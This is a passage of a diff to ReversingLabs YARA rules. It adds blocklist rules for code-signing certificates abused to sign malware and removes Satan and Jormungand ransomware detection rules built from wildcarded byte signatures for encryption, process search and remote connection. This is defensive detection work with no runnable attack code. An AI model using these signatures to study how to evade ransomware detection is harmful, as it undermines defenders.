+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d164846d-9552-5108-8b01-1b4b3e7c0b60"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12388-L12404"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fa2a47f4fb822089fcc958850ce516c8c5d95a6d9b575f3b1d1d4a2ceb2537e4"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_volumes and $find_files and ( all of ( $enum_shares_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVERCONTROL LLC" and pe.signatures [ i ] . serial == "6e:88:9b:b3:b7:f7:19:4b:67:4c:6a:03:35:a6:08:e0" and 1646956800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Satan : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0F62F760704Bdf8Dc30C7Baa7376F484 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Satan ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7ec379d8-172c-52ee-9284-6898dd446468"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "fe326fb9-fe1e-5fc9-8599-6b4cfd6506dd"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Satan.yara#L1-L152"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0074090c2a6cc483deffdc83dc1c0bfbd150e201c27e54f998dd2c0a7660f917"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12406-L12422"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d54d52e116b9404782ce80664f218d2e142577dac672c53c41b82f0466c7375a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Satan"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83
-            C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 6A ??
-            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF D3 8B 3D ?? ?? ?? ?? 6A ?? 56 FF D7 8D 45 ?? 50
-            8D 45 ?? 50 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 89 85 ?? ?? ??
-            ?? FF D3 8B 9D ?? ?? ?? ?? 6A ?? 53 FF D7 68 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 83 C4
-            ?? 8B F0 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 39 7D ?? 76 ?? 68 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 6A ?? 51 50
-            56 FF B5 ?? ?? ?? ?? 03 F8 FF 15 ?? ?? ?? ?? 39 7D ?? 77 ?? 8B 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 53 FF D6 FF B5 ??
-            ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5
-            5D C3
-        }
-		$search_processes = {
-            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 50
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 0F 1F
-            44 00 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 8B 4C B5 ??
-            8D 85 ?? ?? ?? ?? 0F 1F 44 00 ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75
-            ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? FF D7 6A ?? 50 FF D3 46 83 FE ?? 76 ?? 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B
-            E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ??
-            ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 4D
-            ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 83 CB ?? 89
-            5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 F6 89 75 ?? 89 75 ?? 56 68 ?? ??
-            ?? ?? 6A ?? 56 6A ?? 6A ?? 51 8B 3D ?? ?? ?? ?? FF D7 89 45 ?? 3B C3 0F 84 ?? ?? ??
-            ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? FF 75 ?? FF D7 8B D8 89 5D ?? 83 FB ?? 0F
-            84 ?? ?? ?? ?? 8B 7D ?? 8B 07 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 56 56 68 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF
-            75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ??
-            FF 75 ?? 68 ?? ?? ?? ?? FF 37 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 32 C0 89 45 ?? 88
-            45 ?? 33 FF 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 FF 75
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0F B6 C0 81 7D ?? ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 0F 42 C1 89 45 ?? 88 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 56 6A ?? 0F B6
-            C0 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 85 FF 75 ?? 57 8D 45 ?? 50 68 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 47 89 7D ?? 8B 45 ?? 84 C0 0F 84 ?? ?? ?? ?? 80 7D ?? ??
-            74 ?? 83 05 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 45 ??
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$search_files_in_specific_folders_p1 = {
-            51 8D 85 ?? ?? ?? ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B F0 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 FF
-        }
-		$search_files_in_specific_folders_p2 = {
-            75 ?? FF 75 ?? 8D 55 ?? 8B CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85
-            F6 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 FF ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 8B
-            CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41
-            84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 6A ?? 40 8D 4D ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0
-            8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            EC ?? C6 45 ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83
-            EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 84
-            C0 8D 8D ?? ?? ?? ?? 0F 94 C3 EB ?? 83 FF ?? 75 ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8A D8
-        }
-		$search_files_in_specific_folders_p3 = {
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 DB 8B 9D ?? ?? ?? ?? 74 ?? 8D 45 ??
-            8B CB 50 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
-            ?? 33 F6 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ??
-            ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ??
-            ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_processes and ( all of ( $search_files_in_specific_folders_p* ) ) and $encrypt_files and $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shanghai XuSong investment partnership Enterprise(Limited)" and pe.signatures [ i ] . serial == "0f:62:f7:60:70:4b:df:8d:c3:0c:7b:aa:73:76:f4:84" and 1659398400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Jormungand : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_071202Dbfda40B629C5E7Acac947C2D3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Jormungand ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "418c3d9f-2338-593f-a8ec-a1e25afa50d4"
-		date = "2021-10-22"
-		modified = "2021-10-22"
+		id = "4206c383-0e6d-5129-8e6a-05bd54c48e65"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Jormungand.yara#L1-L135"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "049eb4533b37d8d72e50dd1e803a897758386643770d47b3e7690f58e44d5236"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12424-L12440"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cc51b0ae6a59f68e61ee0b4ff33ea0e1ee9ef04e4c994e1c98da6befab62a5b9"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Jormungand"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$drop_ransom_note = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
-            ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ??
-            ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89
-            84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 54 24 ?? 89 14 24 8B 94 24 ?? ?? ?? ??
-            89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ??
-            8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24
-            ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24
-            ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 89
-            5C 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ??
-            8D 4C 24 ?? 89 0C 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C
-            24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 4C 24 ?? 8D
-            44 24 ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ??
-            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? E8 ?? ??
-            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 89 44 24 ??
-            89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            81 C4 ?? ?? ?? ?? C3 E8
-        }
-		$encrypt_files_aes = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 44 24
-            ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24
-            ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 4C 24 ?? 8B 50 ??
-            89 0C 24 FF D2 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ??
-            89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24
-            ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 89
-            1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B
-            44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 54 24 ??
-            89 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24
-            ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ??
-            8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ??
-            89 2C 24 FF D3 8B 05 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44
-            24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89
-            4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 C4 ?? C3 E8
-        }
-		$encrypt_files_rsa = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24
-            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B
-            44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 50 ?? 8B 40 ?? 89 0C 24 89 54 24 ?? 89
-            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 75 ??
-            8D 15 ?? ?? ?? ?? 39 D0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 04
-            24 89 54 24 ?? 89 4C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24
-            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C
-            24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 83 C4 ?? C3 C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C
-            24 ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C7 40 ?? ??
-            ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8D 0D ?? ?? ?? ?? 89 08 C7 44 24 ?? ?? ?? ??
